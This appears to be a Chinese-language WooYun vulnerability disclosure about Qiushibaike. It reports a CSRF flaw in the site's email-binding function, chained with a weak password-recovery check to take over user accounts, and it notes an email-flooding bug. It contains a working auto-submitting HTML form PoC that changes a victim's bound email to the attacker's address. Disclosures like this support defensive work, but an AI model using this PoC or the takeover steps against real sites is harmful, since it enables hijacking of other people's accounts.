WooYun.org

糗事百科貌似一直对CSRF漏洞不太重视，这里我其实就是利用了邮箱绑定位置存在CSRF漏洞，在加上密码找回流程逻辑判断不严格，从而成功重置用户密码的。
顺便友情提供：邮箱绑定的时候，还存在邮箱轰炸漏洞。
测试过程，用两个帐号两个浏览器分别登录进行测试。
1 大号去修改绑定的邮箱，抓包。

2 可以看到，是一个post的请求。

3 去掉refer，再次发送请求，发现可以仍然成功执行请求，接收到绑定邮箱的邮件。

4 说明这里存在POST类型的CSRF漏洞。
5 然后CSRF利用这里就不在详细说明了，不管是直接发url还是用img、iframe的src嵌入，都可以。
6 外部poc构造的利用代码（将邮箱写为自己的邮箱）。

<html><body>
<form name="px" method="post" action="http://www.qiushibaike.com/my/edit">
<input type="text" name="_method"	value="put">
<input type="text" name="user[avatar]" value="">
<input type="text" name="user[email]" value="[email protected]">
<input type="text" name="commit" value="提交">
</form>
<script>
document.px.submit();
</script>
</body></html>

下面切换为小号，模拟正常用户。
7 诱导用户中招CSRF后，会给自己的邮箱发送一封邮件，用于邮箱绑定。

8 点击确认修改按钮发现可以直接成功修改，未登录小号帐号状态下，就可以成功修改绑定邮箱。（这里逻辑验证有问题，应该首先判断用户是否为登录状态，如果不是登录状态则判断为修改失败）。

9 接下来就是用正常的密码找回流程去修改密码，填写好用户帐号和自己刚才修改好的自己的那个绑定邮箱。

10 点击找回密码，会给自己刚才修改的绑定邮箱发送一个找回链接。

11 然后去邮箱我们点击找回密码按钮。

12 然后就会打开密码修改的页面了。

13 填写新密码，可以直接修改用户密码！

THAT'S ALL！THANKS